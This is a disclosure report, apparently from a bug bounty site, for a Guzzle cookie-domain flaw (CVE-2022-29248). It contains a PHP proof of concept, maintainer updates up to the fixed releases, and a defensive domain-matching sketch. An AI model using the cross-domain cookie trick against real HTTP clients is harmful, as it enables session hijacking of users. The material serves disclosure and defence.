Set cookie for different domain in guzzle/guzzle
May 9th 2022
It is not checked if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header.
Proof of Concept
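```php
<?php
require "vendor/autoload.php";

// Client with Guzzle's shared cookie jar enabled.
$client = new \GuzzleHttp\Client(["cookies" => true]);
$client->request("GET", "https://<id>.free.beeceptor.com/setcookie");

// Dump the cookies the jar stored from the response.
$cookies = $client->getConfig('cookies')->toArray();
print_r($cookies);
```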
You can use beeceptor to mock the endpoint, just add the following header to the response:
"Set-Cookie": "poc=1; Domain=huntr.dev"
Also works with `.com` as domain; this would send the cookie to all .com domains.
The vulnerability is capable of stealing sessions if the right conditions are met.
Thanks for reporting this. We will co-ordinate with stakeholders and provide an update within 10 working days.
We are aware of this issue, and we will prepare a fix next week.
We have a fix in progress. We will provide another update on Monday.
We have a proposed fix in place. We are sending it for 3rd party review. We expect to be able to release a fix before the end of May.
We have been allocated CVE-2022-29248.
We have just released v6.5.6 and v7.4.3 and published the advisory. This is now fixed, and the embargo is lifted.
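The check the report describes as missing can be sketched as RFC 6265 section 5.1.3 domain matching applied when a `Set-Cookie` header is received. This is an added example, not Guzzle's code or its actual fix; the function names and the host `mock.example.com` are assumptions, and the single-label rule stands in for a real Public Suffix List lookup.

```php
<?php
declare(strict_types=1);

// Added example with hypothetical function names; not taken from Guzzle.
function domainMatches(string $cookieDomain, string $requestHost): bool
{
    // RFC 6265 ignores a leading dot and compares case-insensitively.
    $domain = strtolower(ltrim($cookieDomain, '.'));
    $host   = strtolower(rtrim($requestHost, '.'));

    if ($domain === '') {
        return false;
    }
    if ($domain === $host) {
        return true; // identical strings always match
    }
    // An IP address host may only match exactly, never as a suffix.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return false;
    }
    // Assumption: stand-in for a Public Suffix List lookup. Single-label
    // domains such as "com" are refused; real clients use the full list.
    if (strpos($domain, '.') === false) {
        return false;
    }
    // Require a "." boundary so "evilhuntr.dev" does not match "huntr.dev".
    return substr($host, -strlen($domain) - 1) === '.' . $domain;
}

function shouldStoreCookie(?string $domainAttr, string $requestHost): bool
{
    // No Domain attribute means a host-only cookie, which is acceptable.
    return $domainAttr === null || domainMatches($domainAttr, $requestHost);
}

// Constructed cases: [Domain attribute, host that sent the Set-Cookie header].
$cases = [
    ['huntr.dev',   'mock.example.com'], // Domain value from the report
    ['.com',        'mock.example.com'], // suffix-wide cookie from the report
    ['example.com', 'mock.example.com'], // legitimate parent domain
    [null,          'mock.example.com'], // host-only cookie
];
foreach ($cases as [$attr, $host]) {
    printf("%-12s from %s => %s\n", $attr ?? '(none)', $host,
        shouldStoreCookie($attr, $host) ? 'store' : 'reject');
}
```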